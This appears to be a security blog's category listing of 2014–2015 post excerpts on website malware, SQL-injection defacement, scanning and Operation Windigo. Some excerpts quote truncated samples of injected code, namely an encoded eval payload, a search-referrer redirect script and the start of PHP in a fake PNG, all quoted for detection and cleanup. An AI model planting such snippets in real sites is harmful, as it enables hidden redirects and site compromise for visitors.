Category: Security News & Information

VisitorTracker Malware – way beyond just JavaScript files

Over the past couple of weeks, we’ve seen a fairly new malware show up in sites. It doesn’t appear to be specific to any one type of cms or website which would point to some type of ‘other’ vulnerability such as a compromised FTP, cPanel or other unknown issue. We haven’t been able to track…
Read more

September 26, 2015 1

Have you been Hacked by Hwins2005 ?

When you visit your site, do you automatically see “Hacked by Hwins2005”, if so, you’ve been hacked. This type of hack is a SQLi and we will walk you through the basic way to detect it, and how to fix. First, if you see this on your site, do a view source from your browser,…
Read more

August 27, 2015 0

“This Site May be Hacked” – increase in detections

Today we’ve seen an increase in websites that Google has labeled with “This Site May be Hacked”. Apparently it looks like a change in the way they detect and label these sites. It is important to note that this label is completely different that the dreaded blocked “malware warning”. Google displays this warning when they…
Read more

February 16, 2015 1

WordPress soaksoak{.}ru – something new?

Today we came across several wordpress sites with something we hadn’t come across yet. It was hidden quite well in the wp-includes directory. They used the template-loader.php file to load up wp-includes/swfobject.js which had the following nasty bit in it, which then redirected users to soaksoak[.]ru: eval( decodeURIComponent( ‘%28%66%75%6E%63%74%69%6F%6E%28%29%20%7B%20%76%61% 72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74% 2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54% 61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B% 30%5D%3B%20%76%61%72%20%73%63%72%69%70%74%3D% 64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65% 45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%…
Read more

December 15, 2014 0

How to scan an HTTP password protected area

There are 2 types of password protected areas: HTTP Password protected areas: These are generally managed by the web server, and the user is prompted with a password dialog. Form-based restricted areas: This type of authentication is handled by the web application. The credentials are requested using a web form. This article explains how to […]

Read More →

The post How to scan an HTTP password protected area appeared first on Acunetix.

October 29, 2014 0

Common Network Security Assessment Oversights

Network security assessments are one of the most critical exercises performed for minimizing business risks. Your time is limited. You’ve got pressure from management to get things done. There’s so much to do and not enough time to do it. … [+]

The post Common Network Security Assessment Oversights appeared first on Acunetix.

July 28, 2014 0

Making Web Security Part of your IT Governance Program

Moving past IT compliance, IT “governance” is becoming the new area of focus in enterprises today. With compliance often being a more tactical business function, IT governance tends to operate at a higher level, especially in larger organizations. Internal audit, … [+]

The post Making Web Security Part of your IT Governance Program appeared first on Acunetix.

July 23, 2014 0

sneaky social.png is not your friend – it contains malware!

Over the past week we came across a couple instances of interesting malware that was not easily detected. We called it the sneaky social.png. It’s not really an image – if you were to open it up with a text editor, you would more than likely see this: < ? php error_reporting( 0 ) ;…
Read more

April 15, 2014 1

Website Redirects using document.referrer

Towards the beginning of the year we saw several spam hacks that used an injected JavaScript redirect; it typically looks like the following: var s=document. referrer; if(s.indexOf(“google”)>0 || s.indexOf(“bing”)>0 || s.indexOf(“yahoo”)>0 || s.indexOf (“aol”)>0){ self.location=’http: // targetsite[.]com’; } When it appears on Windows based servers (which is what we saw several cases of just in…
Read more

April 15, 2014 0

Server hit with Operation Windigo?

The researchers at ESET discovered that approximately 25,000 Unix/Linux servers were highjacked by a backdoor trojan. The have provided a detailed technical overview which you can download from their site. How do you know if you’ve been affected by this? You can run the following command: $ ssh -G 2>&1 | grep -e illegal -e…
Read more

March 20, 2014 0